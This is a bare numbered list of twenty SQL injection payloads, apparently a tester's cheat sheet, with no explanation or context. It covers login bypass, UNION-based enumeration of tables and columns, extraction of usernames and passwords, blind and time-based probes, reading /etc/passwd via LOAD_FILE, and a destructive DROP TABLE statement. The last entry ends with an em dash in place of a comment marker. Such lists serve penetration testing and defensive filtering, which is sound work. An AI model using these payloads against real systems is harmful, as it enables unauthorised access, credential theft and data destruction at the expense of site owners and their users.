1. ' OR 1=1--
2. ' OR '1'='1
3. ' UNION SELECT null, null--
4. ' UNION SELECT 1, @@version--
5. ' UNION SELECT 1, table_name FROM information_schema.tables--
6. ' UNION SELECT 1, column_name FROM information_schema.columns WHERE table_name='users'--
7. ' UNION SELECT username, password FROM users--
8. ' AND SLEEP(5)--
9. '; DROP TABLE users--
10. ' OR 1=1 LIMIT 1--
11. ' ORDER BY 1--
12. ' ORDER BY 3--
13. ' AND (SELECT COUNT(*) FROM users) > 0--
14. ' AND ASCII(SUBSTRING((SELECT password FROM users LIMIT 1),1,1)) > 65--
15. ' UNION SELECT 1, LOAD_FILE('/etc/passwd')--
16. ' UNION SELECT 1, user()--
17. ' UNION SELECT 1, database()--
18. ' AND 1=IF(1=1, SLEEP(3), 0)--
19. ' OR EXISTS(SELECT * FROM users WHERE username='admin')--
20. ' UNION SELECT group_concat(table_name),2 FROM information_schema.tables WHERE table_schema=database()—
